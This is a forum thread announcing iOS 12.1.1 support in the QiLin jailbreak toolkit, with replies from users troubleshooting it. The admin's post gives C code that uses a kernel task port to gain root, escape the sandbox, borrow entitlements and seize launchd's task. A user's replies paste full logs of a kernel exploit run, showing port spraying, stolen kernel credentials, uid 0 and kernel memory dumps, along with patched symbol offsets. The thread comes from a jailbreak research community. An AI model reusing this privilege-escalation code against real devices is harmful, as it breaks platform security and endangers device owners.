QiLin now supports iOS 12.1.1

Discussion of the QiLin Toolkit. Requests for features and bug reports welcome.

QiLin now supports iOS 12.1.1

Postby morpheus » Sun Feb 03, 2019 11:02 pm

Tested on an iPhone XS Max and an iPad 6,8. Got offsets for most all devices, though.

No remount, but ShaiHulud/Platformize/etc do work. Example code:
Code: Select all

    initQiLin(tfp0, KERNEL_BASE + kernel_slide);
   
    rootifyMe();
    ShaiHuludMe(0);
    int test = open ("/tmp/test", O_WRONLY | O_CREAT);
    if (test < 0) perror ("open");
    else {printf("Yep - %d\n", test);
    close (test);}
   
    uint64_t origCreds = 0;
   
    int wantBorrow = 1;
    if (wantBorrow) {
        origCreds = borrowEntitlementsFromDonor("/usr/bin/sysdiagnose", "-u");
    }
   
   // int  rc = execCommand("/bin/ps", "-ef", NULL, NULL, NULL,NULL,0);
   //  rc = execCommand("/usr/sbin/ioreg", "-l", "-f", "-w", "0",NULL,0);
    printf("PLATFORMIZING\n");
    platformizeMe();
   
// you can now get any task in the system, e.g. launchd
    mach_port_t ld_task = MACH_PORT_NULL;
    kern_return_t kr = task_for_pid(mach_task_self(), 1, &ld_task);
    printf("LD task: 0x%x\n", ld_task);
   
// And spawn any command -     
    int  rc2 = execCommand("/sbin/mount", NULL, NULL, NULL, NULL,NULL,0);
 
                             int  rc1 = execCommand("/bin/ps", "-ef", NULL, NULL, NULL,NULL,0);

morpheus
Site Admin
 
Posts: 723
Joined: Thu Apr 11, 2013 6:24 pm

Re: QiLin now supports iOS 12.1.1

Postby saltthehash » Sun Feb 10, 2019 1:08 am

Thanks for this update!!! While trying to jailbreak with Brandon's exploit and QiLin, I found an issue in the kernel symbol table.

It seems that some of the symbol addresses that were added for iOS 12+ are null, and this causes symbol searching to end early before searching through the whole list. From what I can see in the binary, the first null symbol address is for iPod7,2 12.1.2. Once I patched the binary just to get my PoC working, everything seemed to work correctly. Thank you again!
saltthehash
 
Posts: 4
Joined: Sat Sep 15, 2018 2:44 am

Re: QiLin now supports iOS 12.1.1

Postby fr3nsis » Wed Feb 13, 2019 11:56 am

i'm trying on an iphone 5s 12.1.1b3 but i have some troubles ....
kernproc addr = 0xfffffff0172b5b00 (0xfffffff0088b5b00 without k_slide)
i have also tried to use setsymbol

Code: Select all
2019-02-13 12:27:09.214369+0100 v3ntex[187:2629] STATUS: Got 64-bit kernel. Great
Please set kernproc now
2019-02-13 12:27:09.214506+0100 v3ntex[187:2629] STATUS: Loaded The QiLin Toolkit (Feb  3 2019 17:22:09) for Darwin 18.2.0 Darwin Kernel Version 18.2.0: Mon Nov 12 21:07:35 PST 2018; root:xnu-4903.232.2~2/RELEASE_ARM64_S5L8960X iPhone6,2 - iPhone
<CFBasicHash 0x28225ba80 [0x1f6e41610]>{type = mutable dict, count = 10,
entries =>
   0 : <CFString 0x28376a820 [0x1f6e41610]>{contents = "SystemImageID"} = <CFString 0x28225bac0 [0x1f6e41610]>{contents = "864C5304-5E7F-45E3-ABB1-C300D510BEA2"}
   1 : <CFString 0x1f6e63818 [0x1f6e41610]>{contents = "ProductBuildVersion"} = 16C5050a
   2 : BuildID = <CFString 0x28225ba00 [0x1f6e41610]>{contents = "DD55DC62-E71B-11E8-8FEF-63FF0EBD289E"}
   3 : <CFString 0x1f6e5d278 [0x1f6e41610]>{contents = "ProductCopyright"} = <CFString 0x283924a80 [0x1f6e41610]>{contents = "1983-2018 Apple Inc."}
   4 : <CFString 0x1f6e62f18 [0x1f6e41610]>{contents = "ProductVersion"} = 12.1.1
   5 : <CFString 0x1f6e54d78 [0x1f6e41610]>{contents = "ReleaseType"} = Beta
   6 : <CFString 0x1f6e7c358 [0x1f6e41610]>{contents = "Version"} = <CFString 0x1f6e7c358 [0x1f6e41610]>{contents = "Version"}
   7 : <CFString 0x1f6e5aaf8 [0x1f6e41610]>{contents = "ProductName"} = iPhone OS
   8 : <CFString 0x1f6e7c378 [0x1f6e41610]>{contents = "Build"} = <CFString 0x1f6e7c378 [0x1f6e41610]>{contents = "Build"}
   9 : <CFString 0x1f6e7c2b8 [0x1f6e41610]>{contents = "FullVersionString"} = <CFString 0x282225c00 [0x1f6e41610]>{contents = "Version 12.1.1 (Build 16C5050a)"}
}
looking for me..
CAN'T FIND OFFSET OF KERNEL SYMBOL _kernproc for iPhone6,2, 12.1.1 in 157 entries
2019-02-13 12:27:09.288704+0100 v3ntex[187:2629] Can't find symbol _kernproc ...
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
SH2:
looking for me..
CAN'T FIND OFFSET OF KERNEL SYMBOL _kernproc for iPhone6,2, 12.1.1 in 157 entries
2019-02-13 12:27:09.289869+0100 v3ntex[187:2629] Can't find symbol _kernproc ...
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
Yep - 3


i have patched qilin binary with offset but won't work

Code: Select all
2019-02-13 15:09:31.007779+0100 v3ntex[195:2858] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5b00 + 0x3200000
looking for me..
2019-02-13 15:09:31.013648+0100 v3ntex[195:2858] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5b00 + 0x3200000
Failed read from 0x0 - kr : 0x1
Error - (os/kern) invalid address
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00
KernCredAddr : 0x0 (offset 0xf8). OffsetOf p_comm : 0x250
PID 195 not found
fr3nsis
 
Posts: 3
Joined: Tue Jan 15, 2019 8:56 am

Re: QiLin now supports iOS 12.1.1

Postby fr3nsis » Wed Feb 13, 2019 3:25 pm

patching qilin with ida address now seems to work

kernproc_addr=0xfffffff01e2b5b00
Kernel slide: 0x15a00000
kernproc_addr - slide => 0xfffffff0088b5b00 not work
0xfffffff0088b5ef8 works

Code: Select all
kern=Darwin Kernel Version 18.2.0: Mon Nov 12 21:07:35 PST 2018; root:xnu-4903.232.2~2/RELEASE_ARM64_S5L8960X
page size: 0x1000, (os/kern) successful
real pipecnt=0x500
service: 5903
client: 5e07, (os/kern) successful
newSurface: (os/kern) successful
stuffport: 5f03, (os/kern) successful
mach_port_insert_right: (os/kern) successful
mach_msg: (os/kern) successful
herp derp
task_swap_mach_voucher: (os/kern) successful
my_gc breaking at 2425 with tdiff=4421
port_address=0xfffffff00972cca0
fake_voucher_idx=7134
fake_voucher_jdx=32
Shifted Port!
kport.ip_kobject=0xfffffff00982c700
sprayed pipecnt=0x500
targetVoucher->iv_port=0xfffffff00982c000
final buf realloc :o
reallocate_buf: (os/kern) successful
replaceing real_port_to_fake_voucher...
old real_port_to_fake_voucher=3480323
new real_port_to_fake_voucher=3190275
p->ip_srights=100
gfakeport_idx=109
useport_addr=0xfffffff00972cbf8
doing first kread...
test=0x6580000002
realport_addr=0xfffffff003afbe98
itk_space=0xfffffff00442a420
self_task=0xfffffff0017c75a0
IOSurfaceRootUserClient_port=0xfffffff003afbd48
IOSurfaceRootUserClient_addr=0xfffffff0050c5470
IOSurfaceRootUserClient_vtab=0xfffffff01ce9fcb0
Kernel base: 0xfffffff01ca04000
Kernel Magic: 0xfeedfacf
Kernel slide: 0x15a00000
zone_map_addr=0xfffffff078c4c6b0
kport.ip_kobject=0xfffffff00982c100
remapping fakeport
shmem_addr: 0x0000000100eec000
dumping vtab...
kernel_task=0xfffffff000b9cc20, (os/kern) successful
kernproc_addr=0xfffffff01e2b5b00, (os/kern) successful
kern_ucred=0xfffffff000e7aa70, (os/kern) successful
self_proc=0xfffffff0037adbe8, (os/kern) successful
self_ucred=0xfffffff001cacfc0, (os/kern) successful
uid: 501
copyin=(os/kern) successful
stole the kernel's credentials
uid: 0
realhost: 30af03 (host: 1303)
kernel_map=0xfffffff078c4c7c8, (os/kern) successful
ipc_space_kernel=0xfffffff000b81e00, (os/kern) successful
zm_range: fffffff000961000-fffffff01618e000, (os/kern) successful
zm_task_addr=0xfffffff00982c100
km_task_addr=0xfffffff00982c400
zm_port addr: 0xfffffff00a16c418
km_port addr: 0xfffffff00a16ac78
copyin=(os/kern) successful
mach_ports_lookup: (os/kern) successful
zone_map port: 30b003
kernel_map port: 349303
copyin=(os/kern) successful
mach_vm_remap: (os/kern) successful
remap_addr: 0xfffffff0008fcc20
mach_vm_wire: (os/kern) successful
newport=0xfffffff00a16abd0
copyin=(os/kern) successful
kernel_task=30b103, (os/kern) successful
cleaning up...
2019-02-13 15:47:26.057549+0100 v3ntex[195:2838] STATUS: Got 64-bit kernel. Great
Please set kernproc now
2019-02-13 15:47:26.057679+0100 v3ntex[195:2838] STATUS: Loaded The QiLin Toolkit (Feb  3 2019 17:22:09) for Darwin 18.2.0 Darwin Kernel Version 18.2.0: Mon Nov 12 21:07:35 PST 2018; root:xnu-4903.232.2~2/RELEASE_ARM64_S5L8960X iPhone6,2 - iPhone
<CFBasicHash 0x28097b4c0 [0x1d942d610]>{type = mutable dict, count = 10,
entries =>
   0 : <CFString 0x281c51180 [0x1d942d610]>{contents = "SystemImageID"} = <CFString 0x28097b3c0 [0x1d942d610]>{contents = "864C5304-5E7F-45E3-ABB1-C300D510BEA2"}
   1 : <CFString 0x1d944f818 [0x1d942d610]>{contents = "ProductBuildVersion"} = 16C5050a
   2 : BuildID = <CFString 0x28097b600 [0x1d942d610]>{contents = "DD55DC62-E71B-11E8-8FEF-63FF0EBD289E"}
   3 : <CFString 0x1d9449278 [0x1d942d610]>{contents = "ProductCopyright"} = <CFString 0x281200570 [0x1d942d610]>{contents = "1983-2018 Apple Inc."}
   4 : <CFString 0x1d944ef18 [0x1d942d610]>{contents = "ProductVersion"} = 12.1.1
   5 : <CFString 0x1d9440d78 [0x1d942d610]>{contents = "ReleaseType"} = Beta
   6 : <CFString 0x1d9468358 [0x1d942d610]>{contents = "Version"} = <CFString 0x1d9468358 [0x1d942d610]>{contents = "Version"}
   7 : <CFString 0x1d9446af8 [0x1d942d610]>{contents = "ProductName"} = iPhone OS
   8 : <CFString 0x1d9468378 [0x1d942d610]>{contents = "Build"} = <CFString 0x1d9468378 [0x1d942d610]>{contents = "Build"}
   9 : <CFString 0x1d94682b8 [0x1d942d610]>{contents = "FullVersionString"} = <CFString 0x28097b1c0 [0x1d942d610]>{contents = "Version 12.1.1 (Build 16C5050a)"}
}
2019-02-13 15:47:26.067304+0100 v3ntex[195:2838] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5ef8 + 0x15a00000
2019-02-13 15:47:26.067418+0100 v3ntex[195:2838] Find:18446744005496233720
looking for me..
2019-02-13 15:47:26.067624+0100 v3ntex[195:2838] Symbol _kernproc for iPhone6,2, 12.1.1 - 0xfffffff0088b5ef8 + 0x15a00000
0xfffffff01e2b5b00 00 00 00 00 00 00 00 00    0xfffffff0013cf7f0   ..........<.....
0xfffffff01e2b5b10    0xfffffff000b9cc20      0xfffffff01e2b5b00    ........[+.....
0xfffffff01e2b5b20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b50 00 00 00 00 00 00 00 00 00 00 00 22 00 00 00 00 ..........."....
0xfffffff01e2b5b60 00 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5b70    0xfffffff01e2b5f48   00 00 00 00 00 00 00 00 H_+.............
0xfffffff01e2b5b80 00 00 00 00 00 00 00 00    0xfffffff0013cf7f0   ..........<.....
0xfffffff01e2b5b90    0xfffffff000ba9530      0xfffffff000ba96a8   0...............
0xfffffff01e2b5ba0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5bb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5bc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5bd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5be0 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 ..."............
0xfffffff01e2b5bf0 00 00 00 22 00 00 00 00    0xfffffff000e7aa70   ..."....p.......
0xfffffff01e2b5c00    0xfffffff01e2b60e0      0xfffffff01e2b6200   .`+......b+.....
0xfffffff01e2b5c10    0xfffffff01e2b6168      0xfffffff01e2b63b8   ha+......c+.....
0xfffffff01e2b5c20 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c30 00 00 00 00 00 00 00 00 00 00 00 00 04 02 00 00 ................
0xfffffff01e2b5c40 00 00 00 00 00 00 02 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c50 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5c90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5ca0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5ce0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5cf0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d40 00 00 00 00 00 80 48 18 00 00 00 00 15 00 00 00 ......H.........
0xfffffff01e2b5d50 6b 65 72 6e 65 6c 5f 74 61 73 6b 00 00 00 00 00 kernel_task.....
0xfffffff01e2b5d60 00 6b 65 72 6e 65 6c 5f 74 61 73 6b 00 00 00 00 .kernel_task....
0xfffffff01e2b5d70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5d80 00 00 00 00 00 00 00 00    0xfffffff01e2b5f38   ........8_+.....
0xfffffff01e2b5d90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5da0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5dc0    0xfffffff01e2b5db8   00 00 00 00 00 00 00 00 .]+.............
0xfffffff01e2b5dd0    0xfffffff01e2b5dc8   00 00 00 00 00 00 00 00 .]+.............
0xfffffff01e2b5de0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5df0 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ................
0xfffffff01e2b5e00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

0xfffffff01e2b5e10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0xfffffff01e2b5e20 00 00 00 00 00 00 00 00 c4 2d 64 5c 00 00 00 00 .........-d\....
0xfffffff01e2b5e30 e0 4a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 .J..............
0xfffffff01e2b5e40 00 00 00 00 00 00 00 00
KernCredAddr : 0xfffffff000e7aa70 (offset 0xf8). OffsetOf p_comm : 0x250
2019-02-13 15:47:26.074735+0100 v3ntex[195:2838] DEBUG: Process 0@0xfffffff01e2b5b00 - kernel_task
2019-02-13 15:47:26.074997+0100 v3ntex[195:2838] DEBUG: Process 1@0xfffffff0013cf7f0 - launchd
2019-02-13 15:47:26.075036+0100 v3ntex[195:2838] DEBUG: Process 19@0xfffffff0013cfbe8 - syslogd
2019-02-13 15:47:26.075139+0100 v3ntex[195:2838] DEBUG: Process 20@0xfffffff0013cf3f8 - UserEventAgent
2019-02-13 15:47:26.075176+0100 v3ntex[195:2838] DEBUG: Process 21@0xfffffff0013cf000 - assistantd
2019-02-13 15:47:26.075211+0100 v3ntex[195:2838] DEBUG: Process 22@0xfffffff0017313f8 - wifiFirmwareLoad
2019-02-13 15:47:26.075245+0100 v3ntex[195:2838] DEBUG: Process 23@0xfffffff001731000 - fseventsd
2019-02-13 15:47:26.075366+0100 v3ntex[195:2838] DEBUG: Process 24@0xfffffff0017317f0 - mediaserverd
2019-02-13 15:47:26.075400+0100 v3ntex[195:2838] DEBUG: Process 25@0xfffffff001731be8 - coreauthd
2019-02-13 15:47:26.075433+0100 v3ntex[195:2838] DEBUG: Process 26@0xfffffff0017457f0 - mediaremoted
2019-02-13 15:47:26.075466+0100 v3ntex[195:2838] DEBUG: Process 27@0xfffffff001745be8 - mstreamd
2019-02-13 15:47:26.075499+0100 v3ntex[195:2838] DEBUG: Process 28@0xfffffff0017453f8 - routined
2019-02-13 15:47:26.075532+0100 v3ntex[195:2838] DEBUG: Process 29@0xfffffff001745000 - misd
2019-02-13 15:47:26.075565+0100 v3ntex[195:2838] DEBUG: Process 30@0xfffffff0017553f8 - configd
2019-02-13 15:47:26.075598+0100 v3ntex[195:2838] DEBUG: Process 31@0xfffffff0017557f0 - healthd
2019-02-13 15:47:26.075631+0100 v3ntex[195:2838] DEBUG: Process 32@0xfffffff001755be8 - wifivelocityd
2019-02-13 15:47:26.075665+0100 v3ntex[195:2838] DEBUG: Process 33@0xfffffff001755000 - powerd
2019-02-13 15:47:26.075877+0100 v3ntex[195:2838] DEBUG: Process 34@0xfffffff0017673f8 - atc
2019-02-13 15:47:26.075912+0100 v3ntex[195:2838] DEBUG: Process 35@0xfffffff0017677f0 - WirelessRadioMan
2019-02-13 15:47:26.075945+0100 v3ntex[195:2838] DEBUG: Process 37@0xfffffff001767be8 - keybagd
2019-02-13 15:47:26.075978+0100 v3ntex[195:2838] DEBUG: Process 38@0xfffffff0017873f8 - familynotificati
2019-02-13 15:47:26.076145+0100 v3ntex[195:2838] DEBUG: Process 39@0xfffffff0017877f0 - DumpPanic
2019-02-13 15:47:26.076197+0100 v3ntex[195:2838] DEBUG: Process 40@0xfffffff001787be8 - wifid
2019-02-13 15:47:26.076235+0100 v3ntex[195:2838] DEBUG: Process 41@0xfffffff001787000 - logd
2019-02-13 15:47:26.076324+0100 v3ntex[195:2838] DEBUG: Process 42@0xfffffff001797be8 - fud
2019-02-13 15:47:26.076361+0100 v3ntex[195:2838] DEBUG: Process 43@0xfffffff0017977f0 - installd
2019-02-13 15:47:26.076394+0100 v3ntex[195:2838] DEBUG: Process 44@0xfffffff0017973f8 - mobiletimerd
2019-02-13 15:47:26.076428+0100 v3ntex[195:2838] DEBUG: Process 45@0xfffffff001797000 - softwareupdated
2019-02-13 15:47:26.076541+0100 v3ntex[195:2838] DEBUG: Process 46@0xfffffff0017ac3f8 - seld
2019-02-13 15:47:26.076575+0100 v3ntex[195:2838] DEBUG: Process 47@0xfffffff0017ac7f0 - identityservices
2019-02-13 15:47:26.076610+0100 v3ntex[195:2838] DEBUG: Process 49@0xfffffff0017acbe8 - wcd
2019-02-13 15:47:26.076644+0100 v3ntex[195:2838] DEBUG: Process 50@0xfffffff0017c67f0 - SpringBoard
2019-02-13 15:47:26.076677+0100 v3ntex[195:2838] DEBUG: Process 52@0xfffffff0017c63f8 - askpermissiond
2019-02-13 15:47:26.076711+0100 v3ntex[195:2838] DEBUG: Process 53@0xfffffff0017c6000 - wirelessproxd
2019-02-13 15:47:26.076745+0100 v3ntex[195:2838] DEBUG: Process 54@0xfffffff0017e3000 - backboardd
2019-02-13 15:47:26.076778+0100 v3ntex[195:2838] DEBUG: Process 55@0xfffffff0017e33f8 - sharingd
2019-02-13 15:47:26.076810+0100 v3ntex[195:2838] DEBUG: Process 56@0xfffffff0017e37f0 - timed
2019-02-13 15:47:26.076844+0100 v3ntex[195:2838] DEBUG: Process 57@0xfffffff0017e3be8 - locationd
2019-02-13 15:47:26.076941+0100 v3ntex[195:2838] DEBUG: Process 58@0xfffffff0017f6000 - containermanager
2019-02-13 15:47:26.077002+0100 v3ntex[195:2838] DEBUG: Process 59@0xfffffff0017f63f8 - imagent
2019-02-13 15:47:26.077050+0100 v3ntex[195:2838] DEBUG: Process 60@0xfffffff0017f67f0 - assertiond
2019-02-13 15:47:26.077084+0100 v3ntex[195:2838] DEBUG: Process 61@0xfffffff0017f6be8 - cloudpaird
2019-02-13 15:47:26.077117+0100 v3ntex[195:2838] DEBUG: Process 62@0xfffffff001814be8 - mobilewatchdog
2019-02-13 15:47:26.077161+0100 v3ntex[195:2838] DEBUG: Process 63@0xfffffff0018147f0 - lockdownd
2019-02-13 15:47:26.077194+0100 v3ntex[195:2838] DEBUG: Process 64@0xfffffff0018143f8 - aggregated
2019-02-13 15:47:26.077227+0100 v3ntex[195:2838] DEBUG: Process 65@0xfffffff001814000 - OTACrashCopier
2019-02-13 15:47:26.077261+0100 v3ntex[195:2838] DEBUG: Process 66@0xfffffff001822000 - AppleCredentialM
2019-02-13 15:47:26.077445+0100 v3ntex[195:2838] DEBUG: Process 67@0xfffffff0018223f8 - ptpd
2019-02-13 15:47:26.077544+0100 v3ntex[195:2838] DEBUG: Process 68@0xfffffff0018227f0 - navd
2019-02-13 15:47:26.077645+0100 v3ntex[195:2838] DEBUG: Process 69@0xfffffff001822be8 - budd
2019-02-13 15:47:26.077682+0100 v3ntex[195:2838] DEBUG: Process 70@0xfffffff00183a7f0 - rapportd
2019-02-13 15:47:26.077715+0100 v3ntex[195:2838] DEBUG: Process 72@0xfffffff00183a3f8 - bluetoothd
2019-02-13 15:47:26.077748+0100 v3ntex[195:2838] DEBUG: Process 74@0xfffffff00184e7f0 - fairplayd.H2
2019-02-13 15:47:26.077782+0100 v3ntex[195:2838] DEBUG: Process 75@0xfffffff00184e3f8 - CommCenter
2019-02-13 15:47:26.077814+0100 v3ntex[195:2838] DEBUG: Process 76@0xfffffff00184ebe8 - notifyd
2019-02-13 15:47:26.077847+0100 v3ntex[195:2838] DEBUG: Process 77@0xfffffff00184e000 - cfprefsd
2019-02-13 15:47:26.077880+0100 v3ntex[195:2838] DEBUG: Process 78@0xfffffff00183abe8 - distnoted
2019-02-13 15:47:26.077913+0100 v3ntex[195:2838] DEBUG: Process 79@0xfffffff0017c6be8 - lsd
2019-02-13 15:47:26.077945+0100 v3ntex[195:2838] DEBUG: Process 80@0xfffffff001f01be8 - dmd
2019-02-13 15:47:26.078075+0100 v3ntex[195:2838] DEBUG: Process 81@0xfffffff001f017f0 - aslmanager
2019-02-13 15:47:26.078110+0100 v3ntex[195:2838] DEBUG: Process 82@0xfffffff001f013f8 - awdd
2019-02-13 15:47:26.078142+0100 v3ntex[195:2838] DEBUG: Process 83@0xfffffff001f01000 - securityd
2019-02-13 15:47:26.078176+0100 v3ntex[195:2838] DEBUG: Process 84@0xfffffff002297000 - nehelper
2019-02-13 15:47:26.078208+0100 v3ntex[195:2838] DEBUG: Process 85@0xfffffff0022973f8 - mobileassetd
2019-02-13 15:47:26.078241+0100 v3ntex[195:2838] DEBUG: Process 86@0xfffffff0022977f0 - CloudKeychainPro
2019-02-13 15:47:26.078274+0100 v3ntex[195:2838] DEBUG: Process 87@0xfffffff002297be8 - akd
2019-02-13 15:47:26.078307+0100 v3ntex[195:2838] DEBUG: Process 88@0xfffffff0023793f8 - nsurlsessiond
2019-02-13 15:47:26.078339+0100 v3ntex[195:2838] DEBUG: Process 89@0xfffffff0023797f0 - adid
2019-02-13 15:47:26.078372+0100 v3ntex[195:2838] DEBUG: Process 90@0xfffffff002379000 - nsurlstoraged
2019-02-13 15:47:26.078470+0100 v3ntex[195:2838] DEBUG: Process 91@0xfffffff002379be8 - dasd
2019-02-13 15:47:26.078504+0100 v3ntex[195:2838] DEBUG: Process 92@0xfffffff0024053f8 - mDNSResponder
2019-02-13 15:47:26.078538+0100 v3ntex[195:2838] DEBUG: Process 93@0xfffffff002405000 - pfd
2019-02-13 15:47:26.078705+0100 v3ntex[195:2838] DEBUG: Process 94@0xfffffff0024057f0 - MobileGestaltHel
2019-02-13 15:47:26.078742+0100 v3ntex[195:2838] DEBUG: Process 95@0xfffffff002405be8 - mDNSResponderHel
2019-02-13 15:47:26.078776+0100 v3ntex[195:2838] DEBUG: Process 96@0xfffffff0026e93f8 - cloudd
2019-02-13 15:47:26.078809+0100 v3ntex[195:2838] DEBUG: Process 97@0xfffffff0026e97f0 - nanoregistryd
2019-02-13 15:47:26.079460+0100 v3ntex[195:2838] DEBUG: Process 98@0xfffffff0026e9000 - coreduetd
2019-02-13 15:47:26.079502+0100 v3ntex[195:2838] DEBUG: Process 99@0xfffffff0026e9be8 - profiled
2019-02-13 15:47:26.079536+0100 v3ntex[195:2838] DEBUG: Process 100@0xfffffff00283a3f8 - ContextService
2019-02-13 15:47:26.079684+0100 v3ntex[195:2838] DEBUG: Process 101@0xfffffff00283a7f0 - apsd
2019-02-13 15:47:26.079717+0100 v3ntex[195:2838] DEBUG: Process 102@0xfffffff00283a000 - mobileactivation
2019-02-13 15:47:26.079752+0100 v3ntex[195:2838] DEBUG: Process 103@0xfffffff00283abe8 - OTATaskingAgent
2019-02-13 15:47:26.079785+0100 v3ntex[195:2838] DEBUG: Process 104@0xfffffff002a30be8 - carkitd
2019-02-13 15:47:26.079828+0100 v3ntex[195:2838] DEBUG: Process 105@0xfffffff002a307f0 - hangtracerd
2019-02-13 15:47:26.079861+0100 v3ntex[195:2838] DEBUG: Process 106@0xfffffff002a303f8 - MTLCompilerServi
